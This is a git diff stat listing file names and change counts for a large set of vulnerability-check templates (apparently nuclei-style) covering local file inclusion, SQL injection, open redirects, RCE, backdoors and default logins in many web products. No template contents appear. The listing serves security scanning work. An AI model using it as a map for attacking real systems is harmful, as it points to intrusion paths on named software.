+ .../kafka-center-default-login-8415.yaml | 13 +- poc/kafka/kafka-center-default-login.yaml | 42 + poc/kafka/kafka-center-login.yaml | 19 +- poc/kafka/kafka-connect-ui-8423.yaml | 2 +- poc/kafka/kafka-consumer-monitor-8424.yaml | 18 + poc/kafka/kafka-consumer-monitor-8425.yaml | 21 - poc/kafka/kafka-consumer-monitor.yaml | 21 +- poc/kafka/kafka-cruise-control-8426.yaml | 5 +- poc/kafka/kafka-cruise-control-8427.yaml | 5 +- poc/kafka/kafka-monitoring-8428.yaml | 18 + poc/kafka/kafka-monitoring-8430.yaml | 4 +- poc/kafka/kafka-monitoring-8431.yaml | 18 - poc/kong/kong-detect-8499.yaml | 30 +- poc/kong/kong-detect-8501.yaml | 28 +- poc/laravel/laravel-debug-enabled-8576.yaml | 27 - poc/laravel/laravel-debug-enabled.yaml | 23 - poc/laravel/laravel-env-8582.yaml | 52 + poc/laravel/laravel-env-8583.yaml | 8 +- poc/laravel/laravel-filemanager-lfi-8587.yaml | 6 +- poc/laravel/laravel-filemanager-lfi-8588.yaml | 4 + poc/laravel/laravel-ignition-xss-8593.yaml | 18 +- poc/laravel/laravel-ignition-xss.yaml | 30 + poc/laravel/laravel-log-file-8596.yaml | 31 - poc/laravel/laravel-log-file-8598.yaml | 16 +- poc/laravel/laravel-telescope-8600.yaml | 18 +- poc/laravel/laravel-telescope-8601.yaml | 13 +- poc/ldap/phpldapadmin-panel.yaml | 41 + .../Karel-ip-phone-lfi.yaml | 20 +- .../accent-microcomputers-lfi-14.yaml | 17 +- .../accent-microcomputers-lfi-16.yaml | 33 + .../accent-microcomputers-lfi-17.yaml | 34 - .../ad-widget-lfi-124.yaml | 33 - .../ad-widget-lfi-126.yaml | 19 +- .../admin-word-count-column-lfi-81.yaml | 25 + .../admin-word-count-column-lfi.yaml | 14 +- ...l => advanced-access-manager-lfi-116.yaml} | 0 .../advanced-access-manager-lfi.yaml | 35 - .../asanhamayesh-lfi-552.yaml | 32 - .../asanhamayesh-lfi-553.yaml | 21 + .../asanhamayesh-lfi.yaml | 13 +- .../bems-api-lfi-709.yaml | 25 - .../bems-api-lfi-711.yaml | 22 +- .../bems-api-lfi-712.yaml | 24 - .../blue-ocean-excellence-lfi-756.yaml | 33 - .../brandfolder-lfi-778.yaml | 14 +- poc/local_file_inclusion/brandfolder-lfi.yaml | 35 - .../bullwark-momentum-lfi-806.yaml | 19 +- .../bullwark-momentum-lfi-807.yaml | 39 - .../bullwark-momentum-lfi-808.yaml | 16 +- poc/local_file_inclusion/cherry-lfi-902.yaml | 11 +- poc/local_file_inclusion/cherry-lfi-903.yaml | 37 + .../churchope-lfi-915.yaml | 11 +- poc/local_file_inclusion/churchope-lfi.yaml | 32 - .../cs-cart-unauthenticated-lfi-1284.yaml | 26 + ....yaml => cs-cart-unauthenticated-lfi.yaml} | 0 .../db-backup-lfi-6774.yaml | 25 - .../db-backup-lfi-6775.yaml | 30 + .../db-backup-lfi-6776.yaml | 11 +- poc/local_file_inclusion/db-backup-lfi.yaml | 4 - .../diarise-theme-lfi-6990.yaml | 17 +- .../diarise-theme-lfi.yaml | 27 - .../dicoogle-pacs-lfi-6993.yaml | 11 +- poc/local_file_inclusion/eibiz-lfi-7185.yaml | 8 +- poc/local_file_inclusion/eibiz-lfi-7187.yaml | 13 +- .../elfinder-detect-7201.yaml | 12 +- .../elfinder-detect-7202.yaml | 15 +- .../elfinder-path-traversal-7203.yaml | 37 - ...rsal.yaml => elfinder-path-traversal.yaml} | 0 .../elfinder-version-7205.yaml | 19 +- .../elfinder-version.yaml | 38 - .../generic-linux-lfi.yaml | 10 +- .../generic-windows-lfi-7591.yaml | 35 + .../generic-windows-lfi.yaml | 31 +- .../geovision-geowebserver-lfi-7595.yaml | 20 +- .../geovision-geowebserver-lfi-7596.yaml | 17 +- .../global-domains-lfi-7715.yaml | 13 +- .../global-domains-lfi.yaml | 28 + poc/local_file_inclusion/goip-1-lfi-7763.yaml | 11 +- poc/local_file_inclusion/goip-1-lfi-7764.yaml | 23 - .../groupoffice-lfi-7849.yaml | 19 + .../groupoffice-lfi-7850.yaml | 6 +- poc/local_file_inclusion/groupoffice-lfi.yaml | 28 + poc/local_file_inclusion/gsoap-lfi-7855.yaml | 14 +- poc/local_file_inclusion/gsoap-lfi.yaml | 19 + .../hb-audio-lfi-7911.yaml | 19 +- .../hb-audio-lfi-7912.yaml | 13 +- .../health-check-lfi-7922.yaml | 15 +- .../hide-security-enhancer-lfi-7952.yaml | 18 +- .../hide-security-enhancer-lfi.yaml | 23 - .../hrsale-unauthenticated-lfi-8039.yaml | 23 +- .../hrsale-unauthenticated-lfi-8041.yaml | 9 +- .../huawei-hg255s-lfi-8059.yaml | 24 +- .../huawei-hg255s-lfi-8060.yaml | 27 - .../huawei-hg659-lfi-8071.yaml | 5 - .../huawei-hg659-lfi.yaml | 21 - .../issuu-panel-lfi-8199.yaml | 6 +- poc/local_file_inclusion/issuu-panel-lfi.yaml | 29 + poc/local_file_inclusion/jeewms-lfi-8253.yaml | 9 +- poc/local_file_inclusion/jeewms-lfi.yaml | 28 - .../jinfornet-jreport-lfi-8307.yaml | 19 + .../jinfornet-jreport-lfi-8308.yaml | 23 - .../jinfornet-jreport-lfi.yaml | 6 +- .../jolokia-unauthenticated-lfi-8366.yaml | 31 + ....yaml => jolokia-unauthenticated-lfi.yaml} | 0 .../joomla-com-fabrik-lfi-8370.yaml | 16 +- ...i-8371.yaml => joomla-com-fabrik-lfi.yaml} | 0 .../karel-ip-phone-lfi-8436.yaml | 9 +- .../kyocera-m2035dn-lfi-8557.yaml | 16 +- .../kyocera-m2035dn-lfi-8559.yaml | 8 +- .../laravel-filemanager-lfi-8587.yaml | 6 +- .../laravel-filemanager-lfi-8588.yaml | 4 + poc/local_file_inclusion/lfi-linux-fuzz.yaml | 78 + poc/local_file_inclusion/lfi.yaml | 67 +- poc/local_file_inclusion/linux-lfi-fuzz.yaml | 30 +- .../magicflow-lfi-8710.yaml | 8 +- .../magicflow-lfi-8713.yaml | 22 +- .../minimouse-lfi-8877.yaml | 23 + poc/local_file_inclusion/minimouse-lfi.yaml | 1 + .../moodle-filter-jmol-lfi-8938.yaml | 20 - .../moodle-filter-jmol-lfi-8939.yaml | 4 +- .../moodle-filter-jmol-lfi-8941.yaml | 20 +- poc/local_file_inclusion/mpsec-lfi-8957.yaml | 18 +- poc/local_file_inclusion/mpsec-lfi.yaml | 35 - .../oliver-library-lfi-9239.yaml | 16 +- .../oliver-library-lfi-9241.yaml | 13 +- .../opencti-lfi-9267.yaml | 25 +- .../opencti-lfi-9268.yaml | 31 - .../opensis-lfi-9317.yaml | 19 +- poc/local_file_inclusion/opensis-lfi.yaml | 28 - .../oracle-fatwire-lfi-9380.yaml | 21 +- .../orbiteam-bscw-server-lfi-9404.yaml | 33 + .../orbiteam-bscw-server-lfi.yaml | 12 +- ...-lfi.yaml => pacsone-server-lfi-9428.yaml} | 0 .../pacsone-server-lfi-9429.yaml | 20 +- .../phpwiki-lfi-9567.yaml | 3 +- poc/local_file_inclusion/pikpikculfi.yaml | 67 - .../processmaker-lfi-9660.yaml | 2 +- .../processmaker-lfi-9662.yaml | 32 +- .../qihang-media-lfi-9769.yaml | 44 - .../qihang-media-lfi.yaml | 37 + .../ruijie-networks-lfi-9938.yaml | 7 +- .../ruijie-networks-lfi-9942.yaml | 1 - .../samsung-wlan-ap-lfi-10000.yaml | 29 + .../samsung-wlan-ap-lfi-9999.yaml | 25 - .../shortcode-lfi-10214.yaml | 7 +- .../shortcode-lfi-10216.yaml | 14 +- .../simple-image-manipulator-lfi-10281.yaml | 7 +- .../simple-image-manipulator-lfi-10282.yaml | 25 + .../simple-image-manipulator-lfi.yaml | 17 +- .../sl-studio-lfi-10321.yaml | 17 +- poc/local_file_inclusion/sl-studio-lfi.yaml | 22 + poc/local_file_inclusion/sniplets-lfi.yaml | 22 +- .../sofneta-mecdream-pacs-lfi-10350.yaml | 13 +- .../sofneta-mecdream-pacs-lfi.yaml | 30 + .../targa-camera-lfi-10654.yaml | 10 +- .../targa-camera-lfi-10655.yaml | 23 +- .../thinkcmf-lfi-10721.yaml | 21 + .../thinkcmf-lfi-10723.yaml | 33 - .../video-synchro-pdf-lfi-11006.yaml | 9 +- .../video-synchro-pdf-lfi-11007.yaml | 25 + .../video-synchro-pdf-lfi.yaml | 9 +- .../vmware-vcenter-lfi-11047.yaml | 41 - .../vmware-vcenter-lfi-linux-11042.yaml | 2 +- .../vmware-vcenter-lfi.yaml | 27 + poc/local_file_inclusion/wordpress-LFI.yaml | 6 +- poc/local_file_inclusion/wordpress-lfi.yaml | 21 - .../wordpress-wordfence-lfi-11346.yaml | 21 + .../wordpress-wordfence-lfi-11348.yaml | 4 +- .../wordpress-wordfence-lfi-11350.yaml | 21 - .../wp-javospot-lfi-11482.yaml | 38 + poc/local_file_inclusion/wp-javospot-lfi.yaml | 26 - ...p-memphis-documents-library-lfi-11495.yaml | 38 + ...p-memphis-documents-library-lfi-11496.yaml | 4 +- .../wp-simple-fields-lfi-11566.yaml | 19 +- .../wp-simple-fields-lfi-11569.yaml | 20 - .../wp-socialfit-xss-11577.yaml | 4 +- poc/local_file_inclusion/wp-tinymce-lfi.yaml | 10 +- .../wp-tutor-lfi-11596.yaml | 17 +- ...tutor-lfi-11600.yaml => wp-tutor-lfi.yaml} | 0 .../wp-vault-lfi-11610.yaml | 4 +- .../xerox-efi-lfi-11683.yaml | 11 +- poc/local_file_inclusion/xerox-efi-lfi.yaml | 33 + .../yishaadmin-lfi-11744.yaml | 12 +- poc/local_file_inclusion/yishaadmin-lfi.yaml | 33 + poc/magento/magento-2-exposed-api-8687.yaml | 5 +- poc/magento/magento-2-exposed-api-8688.yaml | 45 + poc/magento/magento-admin-panel-8690.yaml | 21 + poc/magento/magento-admin-panel-8692.yaml | 28 - poc/magento/magento-admin-panel-8695.yaml | 6 +- poc/magento/magento-cacheleak-8696.yaml | 15 +- poc/magento/magento-cacheleak-8699.yaml | 40 - poc/magento/magento-config-disclosure.yaml | 50 - poc/magento/magento-detect-8706.yaml | 8 +- poc/microsoft/74cms-sqli-9.yaml | 7 +- .../{74cms-sqli-10.yaml => 74cms-sqli.yaml} | 0 ...aml => aims-password-mgmt-client-219.yaml} | 0 .../aims-password-mgmt-client-221.yaml | 17 + poc/microsoft/aims-password-portal-225.yaml | 22 + poc/microsoft/aims-password-portal.yaml | 2 +- poc/microsoft/api-buttercms-403.yaml | 22 +- poc/microsoft/bems-api-lfi-709.yaml | 25 - poc/microsoft/bems-api-lfi-711.yaml | 22 +- poc/microsoft/bems-api-lfi-712.yaml | 24 - poc/microsoft/bolt-cms-panel-762.yaml | 38 - poc/microsoft/bolt-cms-panel-763.yaml | 37 + poc/microsoft/bolt-cms-panel.yaml | 17 +- ...k-cms-840.yaml => call-break-cms-838.yaml} | 0 poc/microsoft/chamilo-lms-sqli-892.yaml | 37 - poc/microsoft/chamilo-lms-sqli.yaml | 26 + poc/microsoft/cisco-systems-login-973.yaml | 25 + poc/microsoft/cisco-systems-login-975.yaml | 32 - poc/microsoft/cisco-systems-login.yaml | 12 +- poc/microsoft/craft-cms-detect-1247.yaml | 3 +- poc/microsoft/craft-cms-detect.yaml | 28 - .../dahua-wpms-addimgico-fileupload.yaml | 78 +- ...dedecms-carbuyaction-fileinclude-6794.yaml | 30 + ... => dedecms-carbuyaction-fileinclude.yaml} | 0 ...aml => dedecms-membergroup-sqli-6796.yaml} | 0 .../dedecms-membergroup-sqli-6798.yaml | 15 +- poc/microsoft/dedecms-openredirect-6800.yaml | 14 +- poc/microsoft/dedecms-openredirect-6802.yaml | 18 +- .../default-microsoft-azure-page-6873.yaml | 9 +- .../default-microsoft-azure-page-6874.yaml | 6 +- ...7085.yaml => dotcms-admin-panel-7087.yaml} | 0 poc/microsoft/dotnetcms-sqli-7089.yaml | 22 +- poc/microsoft/dotnetcms-sqli.yaml | 25 - .../duomicms-sql-injection-7124.yaml | 27 + poc/microsoft/duomicms-sql-injection.yaml | 22 + ...recms-xss.yaml => empirecms-xss-7218.yaml} | 0 poc/microsoft/empirecms-xss-7220.yaml | 25 - poc/microsoft/ems-login-panel-7223.yaml | 18 - poc/microsoft/feifeicms-lfr-7464.yaml | 6 +- poc/microsoft/feifeicms-lfr.yaml | 26 - poc/microsoft/fuelcms-default-login-7571.yaml | 16 +- poc/microsoft/fuelcms-default-login-7572.yaml | 20 +- ...fuzzing-xss-get-params-html-injection.yaml | 8 +- poc/microsoft/getsimple-cms-detect-7614.yaml | 8 +- poc/microsoft/getsimple-cms-detect-7615.yaml | 9 +- poc/microsoft/grav-cms-detect-7842.yaml | 3 +- poc/microsoft/grav-cms-detect.yaml | 27 - poc/microsoft/isams-panel.yaml | 45 + poc/microsoft/jeewms-lfi-8253.yaml | 9 +- poc/microsoft/jeewms-lfi.yaml | 28 - .../kevinlab-bems-backdoor-8453.yaml | 18 +- .../kevinlab-bems-backdoor-8456.yaml | 18 +- poc/microsoft/kevinlab-bems-sqli-8457.yaml | 30 - poc/microsoft/kevinlab-bems-sqli-8459.yaml | 20 +- .../kevinlab-hems-backdoor-8463.yaml | 7 + .../kevinlab-hems-backdoor-8465.yaml | 25 +- .../kevinlab-hems-backdoor-8467.yaml | 41 - poc/microsoft/kiwitcms-login-8496.yaml | 11 +- poc/microsoft/lotuscms-rce-8650.yaml | 25 - poc/microsoft/lotuscms-rce-8651.yaml | 10 +- poc/microsoft/lotuscms-rce-8652.yaml | 34 + poc/microsoft/lotuscms-rce-8653.yaml | 22 +- poc/microsoft/maccmsv10-backdoor-8683.yaml | 15 +- poc/microsoft/maccmsv10-backdoor-8686.yaml | 23 +- poc/microsoft/metatag-cms-8832.yaml | 14 +- poc/microsoft/metatag-cms-8833.yaml | 31 - ...microsoft-exchange-server-detect-8853.yaml | 33 + ...microsoft-exchange-server-detect-8854.yaml | 26 + .../microsoft-exchange-workflow-8855.yaml | 11 - .../microsoft-exchange-workflow.yaml | 11 + poc/microsoft/ms-adcs-detect-8960.yaml | 24 - poc/microsoft/ms-adcs-detect-8961.yaml | 29 + poc/microsoft/ms-adcs-detect.yaml | 7 +- poc/microsoft/msmtp-config-8967.yaml | 42 + poc/microsoft/myucms-lfr-8985.yaml | 25 - poc/microsoft/myucms-lfr-8987.yaml | 15 - poc/microsoft/netlify-cms-9039.yaml | 19 - poc/microsoft/netlify-cms-9041.yaml | 19 + .../octobercms-default-login-9192.yaml | 65 - poc/microsoft/octobercms-default-login.yaml | 59 + poc/microsoft/octobercms-detect-9195.yaml | 25 - poc/microsoft/octobercms-detect-9196.yaml | 12 +- poc/microsoft/odoo-cms-redirect-9199.yaml | 19 + poc/microsoft/odoo-cms-redirect-9201.yaml | 11 +- poc/microsoft/pandora-fms-console-9451.yaml | 20 - poc/microsoft/pandora-fms-console-9453.yaml | 21 + poc/microsoft/pandora-fms-console.yaml | 22 +- .../pbootcms-database-file-download-9469.yaml | 29 + .../pbootcms-database-file-download.yaml | 20 +- poc/microsoft/plone-cms-detect-9607.yaml | 23 - ...detect.yaml => plone-cms-detect-9608.yaml} | 0 poc/microsoft/powercreator-cms-rce-9645.yaml | 42 + poc/microsoft/powercreator-cms-rce.yaml | 37 + poc/microsoft/quick-cms-sqli.yaml | 42 + poc/microsoft/reflected-params.yaml | 339 +- poc/microsoft/rhymix-cms-detect-9877.yaml | 13 +- poc/microsoft/rhymix-cms-detect-9878.yaml | 22 + poc/microsoft/saferoads-vms-login-9971.yaml | 17 - poc/microsoft/saferoads-vms-login-9973.yaml | 16 + poc/microsoft/saferoads-vms-login.yaml | 18 +- poc/microsoft/samsung-printer-detect.yaml | 22 +- poc/microsoft/samsung-wlan-ap-lfi-10000.yaml | 29 + poc/microsoft/samsung-wlan-ap-lfi-9999.yaml | 25 - poc/microsoft/samsung-wlan-ap-rce-10009.yaml | 23 +- poc/microsoft/samsung-wlan-ap-rce-10010.yaml | 9 +- poc/microsoft/samsung-wlan-ap-xss-10012.yaml | 25 + poc/microsoft/samsung-wlan-ap-xss.yaml | 24 - .../samsung-wlan-default-login-10018.yaml | 45 + poc/microsoft/seaCMS-sqli.yaml | 28 +- poc/microsoft/seacms-rce-10101.yaml | 24 + poc/microsoft/seacms-sqli-10103.yaml | 39 + .../seeddms-default-login-10125.yaml | 16 +- .../seeddms-default-login-10127.yaml | 20 +- poc/microsoft/seeddms-detect-10129.yaml | 40 +- poc/microsoft/seeddms-detect-10131.yaml | 21 + poc/microsoft/sevone-nms-network-manager.yaml | 32 - poc/microsoft/tikiwiki-cms-10773.yaml | 20 + poc/microsoft/tikiwiki-cms-10775.yaml | 20 - poc/microsoft/top-xss-params-10807.yaml | 75 + poc/microsoft/top-xss-params-10809.yaml | 81 - poc/microsoft/vpms-auth-bypass-11066.yaml | 33 + poc/microsoft/vpms-auth-bypass-11068.yaml | 32 - ...r-xss.yaml => wems-manager-xss-11192.yaml} | 0 poc/microsoft/wems-manager-xss-11194.yaml | 21 +- poc/microsoft/wondercms-detect-11222.yaml | 24 + poc/microsoft/wondercms-detect.yaml | 21 - poc/microsoft/wp-arforms-listing-11415.yaml | 31 + .../wp-mstore-plugin-listing-11500.yaml | 30 + ...62.yaml => wp-sfwd-lms-listing-11564.yaml} | 0 poc/microsoft/wp-sfwd-lms-listing-11565.yaml | 3 +- poc/microsoft/wp-super-forms-11585.yaml | 19 +- poc/microsoft/wp-super-forms-11588.yaml | 17 +- poc/microsoft/wuzhicms-detect-11653.yaml | 11 +- poc/microsoft/wuzhicms-detect-11654.yaml | 30 + poc/microsoft/wuzhicms-detect.yaml | 24 + poc/microsoft/wuzhicms-sqli-11659.yaml | 38 +- poc/microsoft/xdcms-sqli-11664.yaml | 30 - poc/microsoft/xdcms-sqli-11666.yaml | 18 +- poc/microsoft/zcms-v3-sqli-11773.yaml | 23 - poc/microsoft/zcms-v3-sqli.yaml | 12 +- poc/microsoft/zhixiangOA-msglog.aspx-sql.yaml | 4 +- poc/microsoft/zms-auth-bypass-11830.yaml | 33 + poc/microsoft/zms-auth-bypass-11832.yaml | 34 - .../alibaba-mongoshake-unauth-268.yaml | 27 + .../alibaba-mongoshake-unauth-270.yaml | 10 +- poc/mongodb/mongodb-detect-8920.yaml | 20 + poc/mongodb/mongodb-detect.yaml | 20 +- poc/mongodb/mongodb-ops-manager.yaml | 19 +- poc/mongodb/mongodb-unauth-8925.yaml | 22 - poc/mongodb/mongodb-unauth-8928.yaml | 15 +- poc/mongodb/rockmongo-default-login-9897.yaml | 47 + poc/mongodb/rockmongo-default-login-9899.yaml | 11 +- poc/mongodb/rockmongo-xss-9902.yaml | 28 - poc/mongodb/rockmongo-xss-9904.yaml | 23 +- .../unauthenticated-mongo-express.yaml | 23 + poc/mysql/exposed-mysql-initial-7323.yaml | 17 +- poc/mysql/exposed-mysql-initial-7324.yaml | 9 +- poc/mysql/mysql-native-password-8981.yaml | 5 +- poc/mysql/mysql-native-password.yaml | 21 +- poc/netlify/api-netlify-470.yaml | 31 - poc/netlify/api-netlify.yaml | 25 + poc/netlify/netlify-cms-9039.yaml | 19 - poc/netlify/netlify-cms-9041.yaml | 19 + poc/nginx/default-nginx-page-6880.yaml | 5 +- poc/nginx/default-nginx-page-6881.yaml | 19 + ...l => git-config-nginxoffbyslash-7628.yaml} | 0 .../git-config-nginxoffbyslash-7630.yaml | 35 + poc/nginx/nginx-config-9098.yaml | 26 +- ...inx-config.yaml => nginx-config-9099.yaml} | 0 poc/nginx/nginx-linux-page-9102.yaml | 17 - poc/nginx/nginx-linux-page-9103.yaml | 6 +- poc/nginx/nginx-linux-page.yaml | 17 - poc/nginx/nginx-proxy-manager-9111.yaml | 3 +- poc/nginx/nginx-proxy-manager-9114.yaml | 4 +- poc/nginx/nginx-version-9122.yaml | 25 - poc/nginx/nginx-version-9123.yaml | 30 + poc/nginx/nginx-version.yaml | 5 - poc/nodejs/gradle-cache-node-detect-7797.yaml | 3 +- poc/nodejs/kube-api-nodes-8507.yaml | 18 +- poc/nodejs/kube-api-nodes-8508.yaml | 25 - poc/nodejs/kube-api-nodes.yaml | 22 - poc/nodejs/lfr_express.yaml | 38 - poc/nodejs/node-ecstatic-listing.yaml | 33 + poc/nodejs/node-integration-enabled-9136.yaml | 17 + poc/nodejs/node-integration-enabled-9137.yaml | 20 - .../puppet-node-manager-detect-9720.yaml | 27 - poc/nodejs/puppet-node-manager-detect.yaml | 20 + poc/nodejs/unauthenticated-mongo-express.yaml | 23 + ...ized-puppet-node-manager-detect-10958.yaml | 20 + ...ized-puppet-node-manager-detect-10959.yaml | 24 - ...authorized-puppet-node-manager-detect.yaml | 9 +- poc/open_redirect/Sap-redirect.yaml | 8 +- .../age-gate-open-redirect-207.yaml | 36 - poc/open_redirect/age-gate-open-redirect.yaml | 29 + .../attitude-theme-open-redirect.yaml | 20 - poc/open_redirect/aws-redirect-651.yaml | 24 + poc/open_redirect/aws-redirect-652.yaml | 13 +- poc/open_redirect/bitrix-open-redirect.yaml | 50 +- .../brandfolder-open-redirect-779.yaml | 23 - .../brandfolder-open-redirect-782.yaml | 22 +- .../dedecms-openredirect-6800.yaml | 14 +- .../dedecms-openredirect-6802.yaml | 18 +- .../drupal-user-enum-redirect-7115.yaml | 21 +- .../eatery-restaurant-open-redirect-7158.yaml | 30 + .../eatery-restaurant-open-redirect.yaml | 20 - .../elementorpage-open-redirect.yaml | 13 +- .../homeautomation-v3-openredirect-7985.yaml | 18 - .../httpbin-open-redirect-8049.yaml | 27 +- poc/open_redirect/httpbin-open-redirect.yaml | 23 - .../music-store-open-redirect-8972.yaml | 20 +- .../music-store-open-redirect.yaml | 21 + ...newsletter-manager-open-redirect-9075.yaml | 4 +- .../newsletter-manager-open-redirect.yaml | 4 +- .../newsletter-open-redirect-9076.yaml | 16 +- .../newsletter-open-redirect.yaml | 22 - poc/open_redirect/odoo-cms-redirect-9199.yaml | 19 + poc/open_redirect/odoo-cms-redirect-9201.yaml | 11 +- .../office365-open-redirect-9212.yaml | 25 +- .../office365-open-redirect-9215.yaml | 24 - poc/open_redirect/open-redirect-9310.yaml | 139 +- .../otobo-open-redirect-9409.yaml | 30 - .../otobo-open-redirect-9411.yaml | 11 +- .../pieregister-open-redirect-9577.yaml | 13 +- .../pieregister-open-redirect-9579.yaml | 4 +- .../pieregister-plugin-open-redirect.yaml | 19 - poc/open_redirect/pollbot-redirect-9621.yaml | 4 +- poc/open_redirect/pollbot-redirect-9622.yaml | 27 + poc/open_redirect/sap-redirect.yaml | 22 - .../ultimatemember-open-redirect-10877.yaml | 30 - .../ultimatemember-open-redirect-10879.yaml | 6 +- poc/open_redirect/url-redirect.yaml | 142 +- ...ekender-newspaper-open-redirect-11186.yaml | 26 +- .../weekender-newspaper-open-redirect.yaml | 18 - ...ress-redirection-plugin-listing-11306.yaml | 22 - ...ess-redirection-plugin-listing-11308.yaml} | 0 .../wp-grimag-open-redirect-11458.yaml | 17 + .../wp-grimag-open-redirect-11461.yaml | 9 +- .../wp-grimag-open-redirect-11462.yaml | 26 +- ...=> wp-gtranslate-open-redirect-11463.yaml} | 0 .../wp-gtranslate-open-redirect-11465.yaml | 22 - .../wp-prostore-open-redirect-11546.yaml | 17 - .../wp-prostore-open-redirect-11549.yaml | 14 +- .../wp-prostore-open-redirect-11550.yaml | 20 + .../wptouch-open-redirect-11592.yaml | 24 + .../wptouch-open-redirect-11595.yaml | 23 +- .../wptouch-plugin-open-redirect.yaml | 13 +- poc/oracle/metadata-oracle-8829.yaml | 36 + poc/oracle/metadata-oracle.yaml | 40 - poc/oracle/oracle-business-control-9346.yaml | 4 +- poc/oracle/oracle-business-control-9347.yaml | 20 - poc/oracle/oracle-dbass-detect-9350.yaml | 1 - poc/oracle/oracle-dbass-detect-9351.yaml | 21 - poc/oracle/oracle-dbass-detect.yaml | 18 - poc/oracle/oracle-dbcs-9353.yaml | 9 +- ...oracle-ebs-bispgraph-file-access-9360.yaml | 16 +- .../oracle-ebs-sqllog-disclosure-9369.yaml | 26 - .../oracle-ebs-sqllog-disclosure-9370.yaml | 18 +- poc/oracle/oracle-ebs-xss-9373.yaml | 29 + poc/oracle/oracle-ebs-xss-9376.yaml | 33 - poc/oracle/oracle-ebs-xss-9377.yaml | 6 +- poc/oracle/oracle-fatwire-lfi-9380.yaml | 21 +- poc/oracle/oracle-http-server-12c-9383.yaml | 4 +- poc/oracle/oracle-http-server-12c-9384.yaml | 19 + poc/oracle/oracle-httpserver12c.yaml | 9 +- .../oracle-integrated-manager-9386.yaml | 32 - .../oracle-integrated-manager-9388.yaml | 8 +- .../oracle-iplanet-web-server-9392.yaml | 28 + poc/oracle/oracle-iplanet-web-server.yaml | 21 - poc/oracle/oracle-opera-login.yaml | 38 + poc/oracle/oracle-people-enterprise-9394.yaml | 22 - poc/oracle/oracle-siebel-xss-9400.yaml | 25 +- poc/oracle/oracle-siebel-xss-9402.yaml | 10 +- poc/other/3cx-management-console-2.yaml | 10 +- poc/other/3g-wireless-gateway-5.yaml | 5 +- poc/other/3g-wireless-gateway-6.yaml | 14 +- poc/other/44 - T9.yaml | 44 +- poc/other/ATHD-DVR-fileRead.yaml | 4 +- poc/other/Alibaba-Anyproxy-fileRead.yaml | 5 +- poc/other/LayerSlider-plugin.yaml | 58 + poc/other/NETSurveillance-fileRead.yaml | 3 + poc/other/X-Remote-IP.yaml | 19 - poc/other/access-log.yaml | 11 +- poc/other/acenet-panel.yaml | 30 + poc/other/acrolinx-dashboard.yaml | 14 +- poc/other/activemq-panel-49.yaml | 28 - poc/other/activemq-panel-52.yaml | 2 + poc/other/activemq-panel-53.yaml | 19 + ...etix-panel.yaml => acunetix-panel-56.yaml} | 0 ...x-panel-54.yaml => acunetix-panel-58.yaml} | 0 poc/other/adiscon-loganalyzer.yaml | 12 +- poc/other/adminer-panel-74.yaml | 51 - poc/other/adminer-panel-77.yaml | 41 + poc/other/adminset-panel-78.yaml | 7 +- poc/other/adminset-panel-79.yaml | 34 + poc/other/adminset-panel-80.yaml | 28 - poc/other/advance-setup-119.yaml | 32 + poc/other/advance-setup-122.yaml | 7 +- poc/other/akamai-cloudtest-253.yaml | 24 - poc/other/akamai-cloudtest.yaml | 57 +- poc/other/alibaba-canal-info-leak-266.yaml | 35 - poc/other/alienvault-usm-271.yaml | 30 + poc/other/alienvault-usm-272.yaml | 10 +- poc/other/ampps-admin-panel-304.yaml | 5 +- poc/other/ampps-admin-panel-305.yaml | 35 - poc/other/ampps-admin-panel-306.yaml | 40 + ...listing.yaml => ampps-dirlisting-307.yaml} | 0 poc/other/ampps-dirlisting-308.yaml | 16 +- poc/other/ampps-panel-309.yaml | 9 +- poc/other/ampps-panel-310.yaml | 40 + poc/other/ansible-semaphore-panel.yaml | 34 + poc/other/antsword-backdoor-333.yaml | 40 - poc/other/antsword-backdoor.yaml | 35 + poc/other/arcgis-panel-531.yaml | 5 +- .../artifactory-anonymous-deploy-549.yaml | 30 - poc/other/artifactory-anonymous-deploy.yaml | 10 +- poc/other/asana.yaml | 14 +- poc/other/aspose-file-download-558.yaml | 27 + poc/other/aspose-file-download-560.yaml | 19 +- poc/other/aspose-ie-file-download-562.yaml | 6 +- poc/other/aspose-pdf-file-download.yaml | 29 - poc/other/aspose-words-file-download-571.yaml | 35 + poc/other/aspose-words-file-download-572.yaml | 20 +- poc/other/audiobookshelf-panel.yaml | 38 + poc/other/automation-direct-596.yaml | 3 +- poc/other/automation-direct-597.yaml | 42 - poc/other/avtech-avn801-camera-panel.yaml | 11 +- poc/other/axis-happyaxis-669.yaml | 9 +- poc/other/axis-happyaxis-670.yaml | 31 - poc/other/axis-happyaxis.yaml | 31 + poc/other/barracuda-panel-686.yaml | 6 +- ...da-panel-685.yaml => barracuda-panel.yaml} | 0 poc/other/bash-scanner.yaml | 5 +- poc/other/basic-cors-694.yaml | 12 +- .../{basic-dns-example.yaml => basic.yaml} | 0 poc/other/beyondtrust-panel-720.yaml | 21 + poc/other/bigip.yaml | 57 - poc/other/bingmaps.yaml | 14 +- poc/other/bitly.yaml | 9 +- poc/other/bitrix-panel-748.yaml | 32 + poc/other/bitrix-panel-750.yaml | 27 - ...anel-767.yaml => bookstack-panel-766.yaml} | 0 poc/other/buddy-panel-797.yaml | 30 - poc/other/buddy-panel.yaml | 20 +- poc/other/buddy-panel.yml | 26 + ...ti-panel-829.yaml => cacti-panel-828.yaml} | 0 .../cacti-weathermap-file-write-832.yaml | 22 + .../cacti-weathermap-file-write-833.yaml | 26 - poc/other/cacti-weathermap-file-write.yaml | 13 +- poc/other/calendly.yaml | 14 +- poc/other/campaignmonitor-841.yaml | 20 - poc/other/campaignmonitor-842.yaml | 21 + poc/other/campaignmonitor.yaml | 3 +- poc/other/can-i-take-over-dns-852.yaml | 140 + poc/other/cerebro-panel-878.yaml | 22 - poc/other/cerebro-panel-881.yaml | 27 + poc/other/certificate-validation-882.yaml | 13 - poc/other/certificate-validation-884.yaml | 12 + poc/other/certificate-validation.yaml | 1 + poc/other/cgi-printenv-885.yaml | 5 +- poc/other/cgi-printenv.yaml | 30 + ...t-page-888.yaml => cgi-test-page-887.yaml} | 0 poc/other/cgi-test-page-890.yaml | 8 +- poc/other/checkmarx-panel-895.yaml | 5 +- poc/other/checkpoint-panel-898.yaml | 29 - poc/other/checkpoint-panel-899.yaml | 58 +- poc/other/checkpoint-panel.yaml | 70 +- poc/other/circarlife-setup-917.yaml | 2 +- poc/other/circarlife-setup-918.yaml | 28 + poc/other/circarlife-setup-920.yaml | 37 - poc/other/circarlife-setup-921.yaml | 17 +- poc/other/citrix-oob-memory-read.yaml | 38 + ...aml => clearpass-policy-manager-1001.yaml} | 0 ...1007.yaml => clientaccesspolicy-1005.yaml} | 